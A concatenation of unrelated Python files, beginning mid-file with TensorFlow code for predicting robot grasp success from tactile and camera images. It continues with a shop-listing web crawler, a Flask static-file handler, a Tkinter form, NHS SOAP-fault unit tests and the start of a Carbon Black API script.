im1_post = im(db['/color_image_KinectB'].value[mid], crop = True),
depth0_pre = depth(crop_kinect(db['/depth_image_KinectA'].value[pre])),
depth0_post = depth(crop_kinect(db['/depth_image_KinectA'].value[mid])),
initial_press_prob = initial_press_prob,
is_gripping = int(is_gripping),
end_effector = parse_ee(db),
object_name = str(np.array(db['object_name'].value)[0]),
db_file = db_file)
data.append(d)
# for db files
ut.save(full_pk_file, data)
# rebalance data?
if rebalance_data:
by_label = [[], []]
for x in ut.shuffled_with_seed(data, 'rebalance1'):
by_label[x['is_gripping']].append(x)
n = min(map(len, by_label))
print len(data), 'before rebalance'
data = ut.shuffled_with_seed(by_label[0][:n] + by_label[1][:n], 'rebalance2')
print len(data), 'after rebalance'
writer = tf.python_io.TFRecordWriter(tf_file)
for d in data:
fbl = lambda x : tf.train.Feature(bytes_list = tf.train.BytesList(value = [x]))
fl = lambda x : tf.train.Feature(float_list = tf.train.FloatList(value = map(float, x.flatten())))
il = lambda x : tf.train.Feature(int64_list = tf.train.Int64List(value = x))
feat = {'gel0_pre': fbl(d['gel0_pre']),
'gel1_pre': fbl(d['gel1_pre']),
'gel0_post': fbl(d['gel0_post']),
'gel1_post': fbl(d['gel1_post']),
'im0_pre': fbl(d['im0_pre']),
'im0_post': fbl(d['im0_post']),
'im1_pre': fbl(d['im1_pre']),
'im1_post': fbl(d['im1_post']),
'depth0_pre': fl(d['depth0_pre']),
'depth0_post': fl(d['depth0_post']),
'end_effector' : fl(d['end_effector']),
'initial_press_prob' : fl(d['initial_press_prob']),
'is_gripping' : il([d['is_gripping']])}
ex = tf.train.Example(features = tf.train.Features(feature = feat))
writer.write(ex.SerializeToString())
writer.close()
ut.save(pk_file, data)
print dset_name, '->', len(data), 'examples'
def read_example(rec_queue, pr):
reader = tf.TFRecordReader()
k, s = reader.read(rec_queue)
feats = {'is_gripping' : tf.FixedLenFeature([], tf.int64),
'end_effector' : tf.FixedLenFeature([3 + 1], tf.float32)}
if 'gel' in pr.inputs:
feats.update({'gel0_pre' : tf.FixedLenFeature([], dtype=tf.string),
'gel1_pre' : tf.FixedLenFeature([], dtype=tf.string),
'gel0_post' : tf.FixedLenFeature([], dtype=tf.string),
'gel1_post' : tf.FixedLenFeature([], dtype=tf.string)})
if 'im' in pr.inputs:
feats.update({'im0_pre' : tf.FixedLenFeature([], dtype=tf.string),
'im0_post' : tf.FixedLenFeature([], dtype=tf.string)})
if 'depth' in pr.inputs:
feats.update({'depth0_pre' : tf.FixedLenFeature([full_dim*full_dim], dtype=tf.float32),
'depth0_post' : tf.FixedLenFeature([full_dim*full_dim], dtype=tf.float32)})
if 'ee' in pr.inputs:
feats.update({'end_effector' : tf.FixedLenFeature([ee_dim], dtype=tf.float32)})
example = tf.parse_single_example(s, features = feats)
out = {'is_gripping' : example['is_gripping']}
if 'ee' in pr.inputs:
out['ee'] = example['end_effector']
base_names = ['gel', 'im', 'depth']
for base_name in base_names:
if base_name not in pr.inputs:
continue
names = [name for name in im_names if name.startswith(base_name)]
ims = []
for name in names:
im = example[name]
if name.startswith('im') or name.startswith('gel'):
im = tf.image.decode_png(im)
im = tf.cast(im, tf.float32)
im.set_shape((full_dim, full_dim, 3))
elif name.startswith('depth'):
im.set_shape((full_dim*full_dim))
im = tf.reshape(im, (full_dim, full_dim))
im = ed(im, 2)
#im = tf.tile(ed(im, 2), (1, 1, 3))
ims.append(im)
combo = tf.concat(ims, 2)
combo = tf.random_crop(combo, (crop_dim, crop_dim, shape(combo, 2)))
combo = tf.image.random_flip_left_right(combo)
if name.startswith('gel'):
combo = tf.image.random_flip_up_down(combo)
print 'group:'
start = 0
for name, im in zip(names, ims):
out[name] = combo[:, :, start : start + shape(im, -1)]
print name, shape(out[name])
start += shape(im, -1)
return out
def read_data(pr, num_gpus):
if hasattr(pr, 'dset_names'):
tf_files = [pj(pr.dsdir, '%s.tf' % x) for x in pr.dset_names]
else:
tf_files = [pj(pr.dsdir, 'train.tf')]
print 'Tf files:', tf_files
queue = tf.train.string_input_producer(tf_files)
names, vals = ut.unzip(read_example(queue, pr).items())
vals = tf.train.shuffle_batch(vals, batch_size = pr.batch_size,
capacity = 2000, min_after_dequeue = 500)
if len(names) == 1:
vals = [vals]
splits = [{} for x in xrange(num_gpus)]
for k, v in zip(names, vals):
s = tf.split(v, num_gpus)
for i in xrange(num_gpus):
splits[i][k] = s[i]
return splits
def normalize_ims(im):
if type(im) == type(np.array([])):
im = im.astype('float32')
else:
im = tf.cast(im, tf.float32)
return -1. + (2./255) * im
def normalize_depth(depth):
depth = tf.cast(depth, tf.float32)
depth = depth / 1000.
depth = -1. + (depth / 2.)
return depth
def make_model(inputs, pr, train, reuse = False, both_ims = True):
n = normalize_ims
def d(x):
x = normalize_depth(x)
#x = tf.tile(ed(x, 2), (1, 1, 3))
x = tf.tile(x, (1, 1, 1, 3))
return x
with slim.arg_scope(vgg.vgg_arg_scope(False)):
feats = []
if 'gel' in pr.inputs:
if not hasattr(pr, 'gels') or (0 in pr.gels):
print 'Using gel 0'
gel0_pre, gel0_post = n(inputs['gel0_pre']), n(inputs['gel0_post'])
else:
gel0_pre, gel0_post = None, None
if not hasattr(pr, 'gels') or (1 in pr.gels):
print 'Using gel 1'
gel1_pre, gel1_post = n(inputs['gel1_pre']), n(inputs['gel1_post'])
else:
gel1_pre, gel1_post = None, None
if both_ims:
feats.append(vgg.vgg_gel2(
gel0_pre, gel0_post,
gel1_pre, gel1_post,
is_training = train,
num_classes = None,
reuse = reuse,
scope = 'gel_vgg16'))
else:
if gel0_pre is not None:
feats.append(vgg.vgg_16(gel0_post - gel0_pre, num_classes = None,
scope = 'gel_vgg16', is_training = train, reuse = reuse)[0])
if gel1_pre is not None:
feats.append(vgg.vgg_16(gel1_post - gel1_pre, num_classes = None,
scope = 'gel_vgg16', reuse = True, is_training = train)[0])
if 'im' in pr.inputs:
feats.append(vgg.vgg_16(n(inputs['im0_pre']), num_classes = None,
scope = 'im_vgg16', is_training = train, reuse = reuse)[0])
feats.append(vgg.vgg_16(n(inputs['im0_post']), num_classes = None,
scope = 'im_vgg16', reuse = True, is_training = train)[0])
if 'depth' in pr.inputs:
feats.append(vgg.vgg_16(d(inputs['depth0_pre']), num_classes = None,
scope = 'depth_vgg16', is_training = train, reuse = reuse)[0])
feats.append(vgg.vgg_16(d(inputs['depth0_post']), num_classes = None,
scope = 'depth_vgg16', is_training = train, reuse = True)[0])
if 'ee' in pr.inputs:
net = inputs['ee']
net = net / ed(tf.sqrt(tf.reduce_sum(net**2, 1)), 1)
net = slim.fully_connected(net, 4096, scope = 'ee/fc1', reuse = reuse)
net = slim.fully_connected(net, 4096, scope = 'ee/fc2', reuse = reuse)
net = slim.fully_connected(net, 4096, scope = 'ee/fc3', reuse = reuse)
w = tf.get_variable("ee/fc1/w", (4096, 4), tf.float32, tf.truncated_normal_initializer(0., 0.01))
b = tf.get_variable("ee/fc1/b", (4096,), tf.float32, tf.constant_initializer(0))
net = tf.nn.xw_plus_b(net, w, b)
net = tf.nn.relu(net)
feats.append(net)
net = tf.concat(feats, 1)
logits = slim.fully_connected(net, 2, scope = 'logits', activation_fn = None, reuse = reuse)
return logits
def gpu_strs(gpus):
if gpus is not None and np.ndim(gpus) == 0:
gpus = [gpus]
return ['/cpu:0'] if gpus is None else ['/gpu:%d' % x for x in gpus]
def set_gpus(gpus):
if gpus is None:
return ['/cpu:0']
else:
if np.ndim(gpus) == 0:
gpus = [gpus]
os.putenv('CUDA_VISIBLE_DEVICES', ','.join(map(str, gpus)))
gpus = range(len(gpus))
return gpu_strs(gpus)
def average_grads(tower_grads):
average_grads = []
for ii, grad_and_vars in enumerate(zip(*tower_grads)):
grads = []
#print ii, len(grad_and_vars)
for g, v in grad_and_vars:
#print g, v.name
if g is None:
print 'skipping', v.name
continue
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
if len(grads) == 0:
#print 'no grads for', v.name
grad = None
else:
#grad = tf.concat_v2(grads, 0)
grad = tf.concat(grads, 0)
#grad = mean_vals(grad, 0)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
# def train_press(pr):
# data = ut.load(pj(pr.dsdir, 'train.pk'))
# xs, ys = [], []
# for ex in data:
# xs.append([ex['initial_press_prob']])
# ys.append(ex['is_gripping'])
# xs = np.array(xs, 'float32')
# ys = np.array(ys, 'int64')
# clf = sklearn.svm.SVC(C = 1., kernel = 'linear')
# clf.fit(xs, ys)
# ut.save(pj(pr.resdir, 'clf.pk'), clf)
def mean_diff(im0, im1):
return np.abs(im1.astype('float32') - im0.astype('float32')).mean()
def example_feats(ex, pr):
feat = []
if 'press' in pr.inputs:
feat.append(ex['initial_press_prob'])
if 'mean-diff' in pr.inputs:
feat.append(mean_diff(ex['gel0_pre'], ex['gel0_post']))
feat.append(mean_diff(ex['gel1_pre'], ex['gel1_post']))
return np.array(feat)
def train_clf(pr):
data = ut.load(pj(pr.dsdir, 'train.pk'))
xs, ys = [], []
for ex in data:
ex = copy.copy(ex)
for k, v in ex.items():
if k.startswith('gel'):
ex[k] = ut.crop_center(ig.uncompress(v), 224)
xs.append(example_feats(ex, pr))
ys.append(ex['is_gripping'])
xs = np.array(xs, 'float32')
ys = np.array(ys, 'int64')
clf = sklearn.pipeline.Pipeline(
[('scale', sklearn.preprocessing.StandardScaler(with_mean = True, with_std = True)),
('svm', sklearn.svm.SVC(C = 1., kernel = 'linear'))])
clf.fit(xs, ys)
ut.save(pj(pr.resdir, 'clf.pk'), clf)
def train(pr, gpus, restore = False, use_reg = True):
print 'Params:'
print pr
gpus = set_gpus(gpus)
ut.mkdir(pr.resdir)
ut.mkdir(pr.dsdir)
ut.mkdir(pr.train_dir)
config = tf.ConfigProto(allow_soft_placement = True)
if ut.hastrue(pr, 'use_clf'):
return train_clf(pr)
with tf.Graph().as_default(), tf.device(gpus[0]), tf.Session(config = config) as sess:
global_step = tf.get_variable('global_step', [], initializer =
tf.constant_initializer(0), trainable = False)
inputs = read_data(pr, len(gpus))
lr = pr.base_lr * pr.lr_gamma**(global_step // pr.step_size)
#opt = tf.train.MomentumOptimizer(lr, 0.9)
if pr.opt_method == 'adam':
opt = tf.train.AdamOptimizer(lr)
elif pr.opt_method == 'momentum':
opt = tf.train.MomentumOptimizer(lr, 0.9)
gpu_grads = []
for gi, gpu in enumerate(gpus):
with tf.device(gpu):
label = inputs[gi]['is_gripping']
logits = make_model(inputs[gi], pr, train = True, reuse = (gi > 0))
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits = logits, labels = label)
loss = tf.reduce_mean(loss)
if use_reg:
reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
print 'Number of regularization losses:', len(reg_losses)
loss = loss + tf.add_n(reg_losses)
eq = tf.equal(tf.argmax(logits, 1), label)
acc = tf.reduce_mean(tf.cast(eq, tf.float32))
gpu_grads.append(opt.compute_gradients(loss))
#train_op = opt.minimize(loss, global_step = global_step)
grads = average_grads(gpu_grads)
train_op = opt.apply_gradients(grads, global_step = global_step)
bn_ups = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
print 'Batch norm updates:', len(bn_ups)
train_op = tf.group(train_op, *bn_ups)
sess.run(tf.global_variables_initializer())
var_list = slim.get_variables_to_restore()
exclude = ['Adam', 'beta1_power', 'beta2_power', 'Momentum', 'global_step', 'logits', 'fc8', 'fc6_', 'fc7_', 'conv6']
var_list = [x for x in var_list if \
not any(name in x.name for name in exclude)]
if restore:
tf.train.Saver(var_list).restore(sess, tf.train.latest_checkpoint(pr.train_dir))
else:
#tf.train.Saver(var_list).restore(sess, init_path)
for base in ['im', 'depth', 'gel']:
print 'Restoring:', base
mapping = {}
for v in var_list:
start = '%s_vgg16/' % base
if v.name.startswith(start):
vgg_name = v.name.replace(start, 'vgg_16/')
vgg_name = vgg_name[:-2]
print vgg_name, '->', v.name
mapping[vgg_name] = v
if len(mapping):
tf.train.Saver(mapping).restore(sess, init_path)
#saver = tf.train.Saver()
tf.train.start_queue_runners(sess = sess)
summary_dir = ut.mkdir('../results/summary')
print 'tensorboard --logdir=%s' % summary_dir
sum_writer = tf.summary.FileWriter(summary_dir, sess.graph)
for i in ut.time_est(range(pr.train_iters)):
step = int(sess.run(global_step))
if (step == 10 or step % checkpoint_iters == 0) or step == pr.train_iters - 1:
check_path = pj(ut.mkdir(pr.train_dir), 'net.tf')
print 'Saving:', check_path
vs = slim.get_model_variables()
tf.train.Saver(vs).save(sess, check_path, global_step = global_step)
if step > pr.train_iters:
break
merged = tf.summary.merge_all()
if step % 1 == 0:
[summary] = sess.run([merged])
sum_writer.add_summary(summary, step)
_, lr_val, loss_val, acc_val = sess.run([train_op, lr, loss, acc])
if step % 10 == 0:
print 'Iteration %d,' % step, 'lr = ', lr_val, \
'loss:', moving_avg('loss', loss_val), 'acc:', moving_avg('acc', acc_val)
sys.stdout.flush()
class NetClf:
def __init__(self, pr, model_file, gpu = '/cpu:0'):
self.sess = None
self.pr = pr
self.gpu = gpu
self.model_file = model_file
self.thresh = 0.5
def __del__(self):
self.deinit()
def init(self):
if self.sess is None:
print 'Restoring:',self.model_file
with tf.device(self.gpu):
tf.reset_default_graph()
print self.gpu
tf.Graph().as_default()
self.sess = tf.Session()
s = (crop_dim, crop_dim, 3)
self.gel0_pre = tf.placeholder(tf.uint8, s, name = 'gel0_pre')
self.gel1_pre = tf.placeholder(tf.uint8, s, name = 'gel1_pre')
self.gel0_post = tf.placeholder(tf.uint8, s, name = 'gel0_post')
self.gel1_post = tf.placeholder(tf.uint8, s, name = 'gel1_post')
self.im0_pre = tf.placeholder(tf.uint8, s, name = 'im0_pre')
self.im0_post = tf.placeholder(tf.uint8, s, name = 'im0_post')
self.depth0_pre = tf.placeholder(tf.float32, (crop_dim, crop_dim, 1), name = 'depth0_pre')
self.depth0_post = tf.placeholder(tf.float32, (crop_dim, crop_dim, 1), name = 'depth0_post')
self.ee = tf.placeholder(tf.float32, ee_dim, name = 'ee')
inputs = {k : ed(getattr(self, k), 0) for k in im_names + ['ee']}
# for k, v in inputs.items():
# print k, v.shape
self.logits = make_model(inputs, self.pr, train = False)
tf.train.Saver().restore(self.sess, self.model_file)
tf.get_default_graph().finalize()
def deinit(self):
if self.sess is not None:
self.sess.close()
self.sess = None
def format_im(self, im):
return ig.scale(im, (crop_dim, crop_dim), 1)#.astype('float32')
def predict(self, multiple_crops = False, **kwargs):
self.init()
if multiple_crops:
pass
# inputs = {}
# for k in im_names:
# inputs[getattr(self, k)] = self.format_im(kwargs[k])
# [logits] = self.sess.run([self.logits], inputs)
# p = ut.softmax(logits[0])[1]
else:
inputs = {}
for k in im_names:
inputs[getattr(self, k)] = self.format_im(kwargs[k])
[logits] = self.sess.run([self.logits], inputs)
p = ut.softmax(logits[0])[1]
return (int(p >= 0.5), p)
class SVMClf:
""" A baseline that makes its decision based on whether the GelSight is pressed. """
def __init__(self, pr):
self.pr = pr
self.clf = ut.load(pj(pr.resdir, 'clf.pk'))
self.thresh = 0.
def predict(self, **kwargs):
#d = self.clf.decision_function(np.array([[kwargs['initial_press_prob']]], dtype = 'float32'))
d = self.clf.decision_function(example_feats(kwargs, self.pr)[None])
d = d[0]
return int(d >= 0), d
#def test(pr, gpu, test_on_train = False, center_crop = False):
def test(pr, gpu, test_on_train = False, crop_type = 'center'):
[gpu] = set_gpus([gpu])
if ut.hastrue(pr, 'use_clf'):
net = SVMClf(pr)
else:
#check_path = tf.train.latest_checkpoint(pr.train_dir)
check_path = pj(pr.train_dir, 'net.tf-%d' % pr.model_iter)
print 'Restoring from:', check_path
net = NetClf(pr, check_path, gpu)
if test_on_train:
print 'Testing on train!'
data = ut.load(pj(pr.dsdir, 'train.pk'))
else:
data = ut.load(pj(pr.dsdir, 'test.pk'))
labels, probs, accs, vals = [], [], [], []
for i in xrange(len(data)):
ex = data[i]
label = ex['is_gripping']
def load_im(k, v):
if k.startswith('gel') or k.startswith('im'):
im = ig.uncompress(v)
elif k.startswith('depth'):
#v = np.tile(v, (1, 1, 3))
im = v.astype('float32')
else:
raise RuntimeError()
if crop_type == 'center':
crops = [ut.crop_center(im, 224)]
elif crop_type == 'multi':
crops = []
dh = (im.shape[0] - crop_dim)
num_dim_samples = 3
for y in np.linspace(0, dh, num_dim_samples).astype('l'):
dw = (im.shape[1] - crop_dim)
for x in np.linspace(0, dw, num_dim_samples).astype('l'):
crops.append(im[y : y + crop_dim, x : x + crop_dim])
return ut.shuffled_with_seed(crops, k.split('_')[0] + str(i))
all_inputs = {k : load_im(k, ex[k]) for k in im_names}
ps = []
for j in xrange(len(all_inputs['gel0_pre'])):
inputs = {k : all_inputs[k][j] for k in im_names}
inputs['initial_press_prob'] = ex['initial_press_prob']
inputs['ee'] = ex['end_effector']
_, prob = net.predict(**inputs)
ps.append(prob)
prob = np.mean(ps)
pred = int(prob >= net.thresh)
print prob, pred, label
labels.append(label)
probs.append(prob)
accs.append(pred == label)
print 'running average acc:', np.mean(accs)
vals.append(ut.Struct(
label = label,
prob = prob,
acc = accs[-1],
idx = i,
db_file = ex['db_file'],
object_name = ex['object_name']))
labels = np.array(labels, 'bool')
probs = np.array(probs, 'float32')
accs = np.array(accs)
acc = np.mean(accs)
ap = sklearn.metrics.average_precision_score(labels, probs)
print 'Accuracy:', acc
print 'mAP:', ap
print 'Base rate:', ut.f3(np.array(ut.mapattr(vals).label).astype('float32').mean())
ut.save(pj(pr.resdir, 'eval_results.pk'),
dict(acc = acc, ap = ap,
results = (labels, probs)))
ut.save(pj(pr.resdir, 'eval.pk'), vals)
def color_depth(depth):
depth = depth.astype('float32') / 1000.
#import parula
#return np.uint8(255*ut.apply_cmap(depth, parula.parula_map, 0.5, 1.2))
return ut.clip_rescale_im(depth, 0.4, 1.)
def vis_example(db_file):
with h5py.File(db_file, 'r') as db:
pre, mid, post = milestone_frames(db)
sc = lambda x : ig.scale(x, (600, None))
im_mid = sc(crop_kinect(ig.uncompress(db['color_image_KinectA'][mid])))
im_post = sc(crop_kinect(ig.uncompress(db['color_image_KinectA'][post])))
depth = sc(color_depth(crop_kinect(db['depth_image_KinectA'][mid])))
gel_a_0 = sc(ig.uncompress(db['GelSightA_image'][pre]))
gel_b_0 = sc(ig.uncompress(db['GelSightB_image'][pre]))
gel_a_1 = sc(ig.uncompress(db['GelSightA_image'][mid]))
gel_b_1 = sc(ig.uncompress(db['GelSightB_image'][mid]))
row = ['Color:', im_mid,
'Depth:', depth,
'Gel_A_1:', gel_a_1,
'Gel_B_1:', gel_b_1,
'Gel_A_0:', gel_a_0,
'Gel_B_0:', gel_b_0,
'Im after:', im_post,
'Name:', str(np.array(db['object_name'].value[0])),
'Path:', db_file.split('/')[-1]]
return row
def analyze(pr):
eval_exs = ut.load(pj(pr.resdir, 'eval.pk'))
# accuracy by object
by_name = ut.accum_dict((ex.object_name, ex) for ex in eval_exs)
accs, labels = [], []
for name in by_name:
exs = by_name[name]
accs.append(np.mean(ut.mapattr(exs).acc))
labels.append(np.mean(ut.mapattr(exs).label))
print name, ut.f4(accs[-1]), ut.f4(labels[-1])
print 'Object-averaged accuracy:', ut.f4(np.mean(accs))
print 'Object-averaged base:', ut.f4(np.mean(labels))
chosen = set()
table = []
for ex in sorted(exs, key = lambda x : x.prob)[::-1]:
if ex.object_name not in chosen:
chosen.add(ex.object_name)
print ex.object_name
row = vis_example(ex.db_file)
row = ['Prob:', ex.prob, 'Label:', ex.label] + row
table.append(row)
ig.show(table, rows_per_page = 25)
def show_db(pr, num_sample = None, num_per_object = 5):
db_files = ut.read_lines(pj(pr.dsdir, 'db_files.txt'))
db_files = ut.shuffled_with_seed(db_files)
counts = {}
db_files = ut.parfilter(db_ok, db_files)
names = ut.parmap(name_from_file, db_files)
table = []
for name, db_file in zip(names, db_files[:num_sample]):
if counts.get(name, 0) < num_per_object:
counts[name] = 1 + counts.get(name, 0)
row = vis_example(db_file)
table.append(row)
ig.show(table)
def get_object_names(pr):
names = set()
for x in ut.read_lines(pj(pr.dsdir, 'all_db_files.txt')):
try:
names.add(name_from_file(x))
except:
print 'Skipping:', x
print '\n'.join(sorted(names))
def run(pr, todo = 'all',
gpu = 0, restore = 0):
todo = ut.make_todo(todo, 'im train test')
if 'im' in todo:
write_data(pr.dsdir)
if 'train' in todo:
train(pr, gpu, restore = restore)
if 'test' in todo:
test(pr, gpu)
|
412025
|
import pandas as pd
from selenium import webdriver
import csv
CHROME_DRIVER_PATH = '/Users/jiwoo/Documents/chromedriver'
FILE_PATH = 'products.csv'
def crawler(keyword):
url = 'http://www.lottemart.com/search/search.do?searchTerm='
url = url + keyword
driver = webdriver.Chrome(CHROME_DRIVER_PATH)
driver.get(url)
df = pd.read_csv(FILE_PATH)
with open(FILE_PATH, 'a') as f:
f.write('\n')
while(1):
try:
product_list = driver.find_elements_by_xpath('//*[@class="product-article"][@data-panel="product"]/div/a')
for product in product_list:
product_code = product.get_attribute("data-prod-cd")
product_name = product.find_element_by_xpath('.//img').get_attribute("alt")
print(product_name, product_code)
df['바코드'] = product_code
df['제품명'] = product_name
df.to_csv(FILE_PATH, mode='a', header=False, line_terminator='\n', index=False)
# 다음 페이지 클릭
next_btn = driver.find_element_by_xpath('//a[@class="page-next"]')
next_btn.send_keys("\n") # 버튼에 엔터 전송
except Exception:
break
driver.close()
except KeyboardInterrupt:
break
driver.close()
if __name__ == "__main__":
crawler("남양")
|
412035
|
import ctypes
import networkx as nx
import numpy as np
import os
import sys
class LearningLib(object):
def __init__(self, args):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.lib = ctypes.CDLL('%s/build/dll/learning_lib.so' % dir_path)
self.lib.Fit.restype = ctypes.c_double
self.lib.GetSol.restype = ctypes.c_double
self.lib.GetResult.restype = ctypes.c_double
arr = (ctypes.c_char_p * len(args))()
arr[:] = [x.encode('utf8') for x in args]
self.lib.Init(len(args), arr)
self.ngraph_train = 0
self.ngraph_test = 0
def __CtypeNetworkX(self, g):
edges = list(g.edges(data='weight', default=1))
#print(len(edges))
#print(len(g.nodes))
sys.stdout.flush()
e_list_from = (ctypes.c_int * len(edges))()
e_list_to = (ctypes.c_int * len(edges))()
weights = (ctypes.c_double * len(edges))()
if len(edges):
a, b, c = zip(*edges)
e_list_from[:] = a
e_list_to[:] = b
weights[:] = c
return (len(g.nodes()), len(edges), ctypes.cast(e_list_from, ctypes.c_void_p), ctypes.cast(e_list_to, ctypes.c_void_p), ctypes.cast(weights, ctypes.c_void_p))
def TakeSnapshot(self):
self.lib.UpdateSnapshot()
def ClearTrainGraphs(self):
self.ngraph_train = 0
self.lib.ClearTrainGraphs()
def InsertGraph(self, g, is_test):
n_nodes, n_edges, e_froms, e_tos, weights = self.__CtypeNetworkX(g)
if is_test:
t = self.ngraph_test
self.ngraph_test += 1
else:
t = self.ngraph_train
self.ngraph_train += 1
self.lib.InsertGraph(is_test, t, n_nodes, n_edges, e_froms, e_tos, weights)
def LoadModel(self, path_to_model):
self.lib.LoadModel(ctypes.c_char_p(path_to_model.encode('utf8')))
def SaveModel(self, path_to_model):
self.lib.SaveModel(ctypes.c_char_p(path_to_model.encode('utf8')))
def GetSol(self, gid, maxn):
sol = (ctypes.c_int * (maxn + 11))()
val = self.lib.GetSol(gid, sol)
return val, sol
def GetResult(self, gid):
sol = (ctypes.c_int * 100)()
val = self.lib.GetResult(gid, sol)
return val, sol
if __name__ == '__main__':
f = LearningLib(sys.argv)
|
412058
|
from . import BaseCommand
from flask import send_from_directory
import os
class ResourceRequestCommand(BaseCommand):
def process(self, request, filename, db_session):
return send_from_directory(
os.path.abspath(
os.path.join(os.path.dirname(__file__), "..")
) + '/static',
filename
)
def newInstance():
return ResourceRequestCommand()
|
412088
|
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from echomesh.base import Settings
from echomesh.base import GetPrefix
from echomesh.expression import Expression
from echomesh.util.thread import Lock
class _Client(object):
def __init__(self):
self.clients = {}
self.lock = Lock.Lock()
Settings.add_client(self)
def get(self, *path):
with self.lock:
value = self.clients.get(path)
if not value:
value = Expression.convert(Settings.get(*path))
self.clients[path] = value
return value
def settings_update(self, get):
with self.lock:
for path in self.clients.keys():
self.clients[path] = Expression.convert(Settings.get(*path))
_CLIENT = _Client()
get = _CLIENT.get
|
412107
|
from tkinter import *
info = [
("Name (TEXT):",1),
("e-mail (TEXT):",2),
("Flat no. (TEXT):",3),
("Tower no. (TEXT):",4),
("Area (NUMBER):",5),
("Parking (TEXT):",6),
("Recpt. Fess (NUMBER):",7),
("Address (TEXT):",8),
("Contact number (TEXT):",9)
]
e=["","","","","","","","","",""] # entries
class Page(Frame):
"""Page is the Frame that will be added/removed at will"""
def __init__(self, root, id):
Frame.__init__(self, root)
Label(self, text="Frame %d" % id).pack()
class insert(Frame):
"""Main application where everything is done"""
def __init__(self, root):
Frame.__init__(self, root)
self.root = root
for data,num in info:
self.row = root
self.lab = Label(self.row, width=25, padx =10, pady = 10, text=data,font=font.Font(family='Helvetica', size=12, weight='bold'), anchor='w')
self.ent = Entry(self.row)
e[num] = ent
self.row.pack(side=TOP, fill=X, padx=5, pady=5)
self.lab.pack(side=LEFT)
self.ent.pack(side=RIGHT, expand=YES, fill=X)
Button(self, text='Show'#, command=CommandsGUI.show_entry_fields
).pack(side=LEFT, padx=5, pady=5)
Button(self, text='Insert to database'#, command=DBOperations.insert_into_db
).pack(side=LEFT, padx=5, pady=5)
Button(self, text='Reset'#, command=DBOperations.reset_val
).pack(side=RIGHT, padx=5, pady=5)
Button(self, text="Next", command=self.next).pack(side=BOTTOM)
def next(self):
"""changes the current page. I've only done next here, but you could
do backwards, skip pages, etc"""
self.pages[self.page].pack_forget() #remove the current page
self.page += 1
if self.page >= 5: #checking haven't gone past the end of self.page
self.page = 0
self.pages[self.page].pack(side=TOP) #add the next one
if __name__ == "__main__":
root = Tk()
app = insert(root)
app.pack()
root.mainloop()
|
412114
|
import os
from pathlib import Path
from xml.etree import ElementTree
from unittest import TestCase
import utilities.file_utilities as file_utilities
from mhs_common.messages.soap_fault_envelope import SOAPFault
class TestSOAPFault(TestCase):
message_dir = Path(os.path.dirname(os.path.abspath(__file__))) / 'test_messages'
def test_is_soap_empty(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_empty.xml' )
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_is_soap_negative(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'ebxml_header.xml')
self.assertFalse(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_single(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_single_error.xml')
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_multiple(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_multiple_errors.xml')
self.assertTrue(SOAPFault.is_soap_fault(ElementTree.fromstring(message)))
def test_soap_fault_empty(self):
self.assertFalse(SOAPFault.is_soap_fault(None))
def test_from_string_single(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_single_error.xml')
fault: SOAPFault = SOAPFault.from_string({}, message)
self.assertEqual(fault.fault_code, 'SOAP:Server')
self.assertEqual(fault.fault_string, 'Application Exception')
self.assertEqual(len(fault.error_list), 1)
self.assertEqual(fault.error_list[0]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[0]['errorCode'], '200')
self.assertEqual(fault.error_list[0]['severity'], 'Error')
self.assertEqual(fault.error_list[0]['location'], 'Not Supported')
self.assertEqual(fault.error_list[0]['description'], 'System failure to process message - default')
def test_from_string_multiple(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_multiple_errors.xml')
fault: SOAPFault = SOAPFault.from_string({}, message)
self.assertEqual(fault.fault_code, 'SOAP:Server')
self.assertEqual(fault.fault_string, 'Application Exception')
self.assertEqual(len(fault.error_list), 2)
self.assertEqual(fault.error_list[0]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[0]['errorCode'], '200')
self.assertEqual(fault.error_list[0]['severity'], 'Error')
self.assertEqual(fault.error_list[0]['location'], 'Not Supported')
self.assertEqual(fault.error_list[0]['description'], 'System failure to process message - default')
self.assertEqual(fault.error_list[1]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[1]['errorCode'], '201')
self.assertEqual(fault.error_list[1]['severity'], 'Error')
self.assertEqual(fault.error_list[1]['location'], 'Not Supported')
self.assertEqual(fault.error_list[1]['description'], 'The message is not well formed')
def test_soap_error_codes_are_retriable_or_not(self):
errors_and_expected = [("a retriable failure to process message error code 200", [200], True),
("a retriable routing failure error code 206", [206], True),
("a retriable failure storing memo error code 208", [208], True),
("a NON retriable error code 300", [300], False),
("a NON retriable set of error codes 300, 207", [300, 207], False),
("a mix of retriable and NON retriable error codes 300, 206", [300, 206], False),
("a mix of retriable and NON retriable error codes 206, 300", [206, 300], False),
("a set of retriable error codes 208, 206", [208, 206], True)
]
for description, error, expected_result in errors_and_expected:
with self.subTest(description):
result = SOAPFault.is_soap_fault_retriable(error)
self.assertEqual(result, expected_result)
|
412137
|
import sys
import time
import struct
import socket
import pprint
import optparse
# in the github repo, cbapi is not in the example directory
sys.path.append('../src/cbapi')
import cbapi
def build_cli_parser():
parser = optparse.OptionParser(usage="%prog [options]", description="Display information about a particular feed report")
# for each supported output type, add an option
#
parser.add_option("-c", "--cburl", action="store", default=None, dest="server_url",
help="CB server's URL. e.g., http://127.0.0.1 ")
parser.add_option("-a", "--apitoken", action="store", default=None, dest="token",
help="API Token for Carbon Black server")
